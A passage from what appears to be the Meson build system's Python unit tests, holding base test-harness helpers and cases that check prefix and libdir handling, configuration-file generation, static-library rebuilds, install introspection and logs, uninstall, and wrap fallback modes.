Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
def test_all_functions_defined_in_ast_interpreter(self):
'''
Ensure that the all functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
def test_mesondata_is_up_to_date(self):
from mesonbuild.mesondata import mesondata
err_msg = textwrap.dedent('''
###########################################################
### mesonbuild.mesondata is not up-to-date ###
### Please regenerate it by running tools/gen_data.py ###
###########################################################
''')
root_dir = Path(__file__).resolve().parent
mesonbuild_dir = root_dir / 'mesonbuild'
data_dirs = mesonbuild_dir.glob('**/data')
data_files = [] # type: T.List[T.Tuple(str, str)]
for i in data_dirs:
for p in i.iterdir():
data_files += [(p.relative_to(mesonbuild_dir).as_posix(), hashlib.sha256(p.read_bytes()).hexdigest())]
current_files = set(mesondata.keys())
scanned_files = {x[0] for x in data_files}
self.assertSetEqual(current_files, scanned_files, err_msg + 'Data files were added or removed\n')
errors = []
for i in data_files:
if mesondata[i[0]].sha256sum != i[1]:
errors += [i[0]]
self.assertListEqual(errors, [], err_msg + 'Files were changed')
class BasePlatformTests(unittest.TestCase):
prefix = '/usr'
libdir = 'lib'
def setUp(self):
super().setUp()
self.maxDiff = None
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
# Get the backend
self.backend = getattr(Backend, os.environ['MESON_UNIT_TEST_BACKEND'])
self.meson_args = ['--backend=' + self.backend.name]
self.meson_native_file = None
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
self.linuxlike_test_dir = os.path.join(src_root, 'test cases/linuxlike')
self.objc_test_dir = os.path.join(src_root, 'test cases/objc')
self.objcpp_test_dir = os.path.join(src_root, 'test cases/objcpp')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
# XCode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = [f'UNKNOWN BACKEND {self.backend.name!r}']
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print(f"{log!r} doesn't exist")
return
with open(log, encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
# If this call hangs CI will just abort. It is very hard to distinguish
# between CI issue and test bug in that case. Set timeout and fail loud
# instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
encoding='utf-8',
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None,
workdir=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix]
if self.libdir:
args += ['--libdir', self.libdir]
if self.meson_native_file:
args += ['--native-file', self.meson_native_file]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args, override_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
with mock.patch.dict(os.environ, override_envvars):
run_mtest_inprocess(['-C', self.builddir])
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest(f'{self.backend.name!r} backend can\'t install files')
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing the stdout and stderr to stdout,
and also return a copy of it
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest(f'Compiler db not available with {self.backend.name} backend')
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# replace it as the command for all compile commands in the parsed json.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list command-lines run by meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def get_meson_log_sanitychecks(self):
'''
Same as above, but for the sanity checks that were run
'''
log = self.get_meson_log()
prefix = 'Sanity check compiler command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = f'{path!r} does not end with {basename!r}'
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertReconfiguredBuildIsNoop(self):
'Assert that we reconfigured and then there was nothing to do'
ret = self.build()
self.assertIn('The Meson build system', ret)
if self.backend is Backend.ninja:
for line in ret.split('\n'):
if line in self.no_rebuild_stdout:
break
else:
raise AssertionError('build was reconfigured, but was not no-op')
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
# XXX: Note CustomBuild did indeed rebuild, because of the regen checker!
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError(f'Invalid backend: {self.backend.name!r}')
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target of each type said that no rebuild was done
# We always have at least one CustomBuild target for the regen checker
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('CustomBuild:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError(f'Invalid backend: {self.backend.name!r}')
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(f'Linking target {target}', ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError(f'Invalid backend: {self.backend.name!r}')
@staticmethod
def get_target_from_filename(filename):
base = os.path.splitext(filename)[0]
if base.startswith(('lib', 'cyg')):
return base[3:]
return base
def assertBuildRelinkedOnlyTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
linked_targets = []
for line in ret.split('\n'):
if 'Linking target' in line:
fname = line.rsplit('target ')[-1]
linked_targets.append(self.get_target_from_filename(fname))
self.assertEqual(linked_targets, [target])
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile(r'Link:\n [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE)
matches = linkre.findall(ret)
self.assertEqual(len(matches), 1, msg=matches)
self.assertEqual(self.get_target_from_filename(matches[0]), target)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError(f'Invalid backend: {self.backend.name!r}')
def assertPathExists(self, path):
m = f'Path {path!r} should exist'
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = f'Path {path!r} should not exist'
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '87 default options')
self.init(testdir, default_args=False, inprocess=True)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
break
else:
raise self.fail('Did not find option "prefix"')
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_do_conf_file_by_format(self):
def conf_str(in_data, confdata, vformat):
(result, missing_variables, confdata_useless) = mesonbuild.mesonlib.do_conf_str('configuration_file', in_data, confdata, variable_format = vformat)
return '\n'.join(result)
def check_formats(confdata, result):
self.assertEqual(conf_str(['#mesondefine VAR'], confdata, 'meson'), result)
self.assertEqual(conf_str(['#cmakedefine VAR ${VAR}'], confdata, 'cmake'), result)
self.assertEqual(conf_str(['#cmakedefine VAR @VAR@'], confdata, 'cmake@'), result)
confdata = ConfigurationData()
# Key error as they do not exists
check_formats(confdata, '/* #undef VAR */\n')
# Check boolean
confdata.values = {'VAR': (False, 'description')}
check_formats(confdata, '#undef VAR\n')
confdata.values = {'VAR': (True, 'description')}
check_formats(confdata, '#define VAR\n')
# Check string
confdata.values = {'VAR': ('value', 'description')}
check_formats(confdata, '#define VAR value\n')
# Check integer
confdata.values = {'VAR': (10, 'description')}
check_formats(confdata, '#define VAR 10\n')
# Check multiple string with cmake formats
confdata.values = {'VAR': ('value', 'description')}
self.assertEqual(conf_str(['#cmakedefine VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value')
self.assertEqual(conf_str(['#cmakedefine VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value')
# Handles meson format exceptions
# Unknown format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'unknown_format')
# More than 2 params in mesondefine
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'meson')
# Mismatched line with format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#cmakedefine VAR'], confdata, 'meson')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake@')
# Dict value in confdata
confdata.values = {'VAR': (['value'], 'description')}
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'meson')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir work. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '87 default options')
# on Windows, /someabs is *not* an absolute path
prefix = 'x:/someabs' if is_windows() else '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
if is_windows():
args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
if is_windows():
args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
if is_windows():
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False)
else:
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
if mesonbuild.mesonlib.default_prefix() == '/usr/local':
expected[None] = expected['/usr/local']
for prefix in expected:
args = []
if prefix:
args += ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '163 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '51 run target')
self.init(testdir)
self.run_target('check_exists')
self.run_target('check-env')
self.run_target('check-env-ct')
def test_run_target_subdir(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '51 run target')
self.init(testdir)
self.run_target('textprinter')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest(f'{self.backend.name!r} backend can\'t install files')
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '59 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
'new_directory': 'share/new_directory',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officially in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest(f'{self.backend.name!r} backend can\'t install files')
testdir = os.path.join(self.common_test_dir, '140 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '59 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
def read_logs():
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
return list(map(lambda l: Path(l.strip()),
filter(lambda l: not l.startswith('#'),
f.readlines())))
logged = read_logs()
for name in logged:
self.assertTrue(name in expected, f'Log contains extra entry {name}')
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, f'Log is missing entry for {name}')
self.assertLess(count, 2, f'Log has multiple entries for {name}')
# Verify that with --dry-run we obtain the same logs but with nothing
# actually installed
windows_proof_rmtree(self.installdir)
self._run(self.meson_command + ['install', '--dry-run', '--destdir', self.installdir], workdir=self.builddir)
self.assertEqual(logged, read_logs())
self.assertFalse(os.path.exists(self.installdir))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
dirname = os.path.join(self.installdir, 'usr/share/dir')
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
self.assertPathDoesNotExist(dirname)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_implicit_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '95 implicit force fallback')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir)
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.new_builddir()
self.init(testdir, extra_args=['--force-fallback-for=something'])
def test_nopromote(self):
testdir = os.path.join(self.common_test_dir, '98 subproject subdir')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--wrap-mode=nopromote'])
self.assertIn('dependency subsub found: NO', cm.exception.stdout)
def test_force_fallback_for(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--force-fallback-for=zlib,foo'])
self.build()
self.run_tests()
def test_testrepeat(self):
testdir = os.path.join(self.common_test_dir, '206 tap tests')
self.init(testdir)
self.build()
self._run(self.mtest_command + ['--repeat=2'])
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt'), encoding='utf-8') as f:
basic_log = f.read()
# Run buggy test with setup that has env that will make it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt'), encoding='utf-8') as f:
vg_log = f.read()
self.assertFalse('TEST_ENV is set' in basic_log)
self.assertFalse('Memcheck' in basic_log)
self.assertTrue('TEST_ENV is set' in vg_log)
self.assertTrue('Memcheck' in vg_log)
# Run buggy test with setup without env that will pass
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
